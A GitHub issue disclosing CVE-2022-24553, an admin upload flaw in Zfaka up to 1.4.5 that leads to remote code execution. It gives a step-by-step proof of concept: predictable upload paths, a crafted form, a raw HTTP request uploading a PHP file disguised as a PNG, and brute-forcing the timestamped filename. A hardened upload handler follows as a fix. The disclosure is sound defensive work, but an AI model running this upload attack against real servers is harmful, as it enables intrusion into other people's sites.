CVE-2022-24553: Zfaka Backend RCE(All version) · Issue #260 · zfaka-plus/zfaka

An issue was found in Zfaka <= 1.4.5. The check in the background file upload function is not strict, resulting in remote command execution.


In the background file upload, Zfaka has only one JS check, in `\public\res\layui\lay\modules\upload.js`.

There is no filtering of the file extension, and there is only a single front-end JS check, so disabling JS directly achieves the background RCE.

[screenshot image-20210526205833957 not included]

The upload controller in the background is located in `\application\modules\Admin\controllers\Products.php`.

The upload path is not returned after the file is uploaded, but we already know the upload path and the naming rules for uploaded files.

[screenshot image-20210526204139761 not included]

UPLOAD_PATH is defined as follows:

```php
define('UPLOAD_PATH', APP_PATH.'/public/res/upload/');
```

CUR_DATE is defined as follows:

```php
define('CUR_DATE', date('Y-m-d'));
```

File name:

```php
$filename = date("His"); // hour + minute + second
```

Taking 21:05 as an example, the output is as follows:

[screenshot image-20210526210650296 not included]

Take 21:05:44 on May 26, 2021 as an example. The full file path is:

```
http://www.xxx.com/res/upload/2021-05-26/210444.php
```

Construct the form directly:

```html
<meta charset="utf-8">
<form action="http://xxx.top/Admin/products/imgurlajax" method="post" enctype="multipart/form-data">
  <label for="file">File:</label>
  <input type="file" name="file" id="file" />
  <!-- Remember to change the pid to the ID of the product (you can get it by capturing the packet when selecting the product in the background) -->
  <input type="text" name="pid" id="pid" />
  <input type="submit" value="Upload" />
</form>
```

At the same time, you need to add the Referer `http://xxx.top/Admin/products/imgurl/?id=1`, and modify the

Otherwise, "please select product ID" will be prompted.

Finally, the complete upload HTTP request is as follows:

```http
POST http://xxx.top/Admin/products/imgurlajax HTTP/1.1
Host: xxxx
Content-Length: 291
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeSrhtSPGxub0H0eb
Origin: http://47.105.132.207
Referer: http://xxx.top/Admin/products/imgurl/?id=12
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=ql4ep5uk8cf9i0rvihrruuilaq
Connection: close

------WebKitFormBoundaryeSrhtSPGxub0H0eb
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php
phpinfo();
------WebKitFormBoundaryeSrhtSPGxub0H0eb
Content-Disposition: form-data; name="pid"

12
------WebKitFormBoundaryeSrhtSPGxub0H0eb--
```

The direct upload succeeded.

Then run through the last seconds with Burp Suite Intruder, since the number of seconds can't be known that accurately after all.

[screenshot image-20210526212753095 not included]

[screenshot image-20210526233749316 not included]
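As an added defender's example (not Zfaka's own code), the following PHP upload handler closes both weaknesses described above: the type is decided on the server from the file bytes rather than by the front-end JS check, and the stored name is random rather than `date("His")`, so the path can no longer be predicted. `UPLOAD_PATH` mirrors the page's definition; `APP_PATH`, the function name and the allowed-type list are assumptions.

```php
<?php
// Added example, not Zfaka's code. Hardened replacement for the upload handling
// described above: the type is checked on the server from the file bytes, and the
// stored name is random instead of date('His'), so the path cannot be predicted.
// UPLOAD_PATH mirrors the page's definition; APP_PATH is assumed to be set by the app.

define('UPLOAD_PATH', APP_PATH . '/public/res/upload/');

// Maps the MIME type detected from the file contents to the extension we assign
// ourselves; the client-supplied filename and Content-Type are ignored entirely.
const ALLOWED_IMAGE_TYPES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function store_uploaded_image(array $file): string
{
    // Reject transport errors, empty uploads, and anything not delivered via HTTP upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || (int) $file['size'] <= 0) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Decide the type from the bytes: the request on the page sends PHP code with
    // Content-Type: image/png, which this check no longer trusts.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime]) || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an allowed image');
    }

    // Server-chosen directory and an unguessable name with a server-chosen extension.
    $dir = UPLOAD_PATH . date('Y-m-d') . '/';
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('cannot create upload directory');
    }
    $dest = $dir . bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('cannot store file');
    }
    chmod($dest, 0640); // not executable on disk
    return $dest;
}
```

The upload directory must additionally be served with script execution disabled, since a content check alone cannot rule out a valid image that also carries script text.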
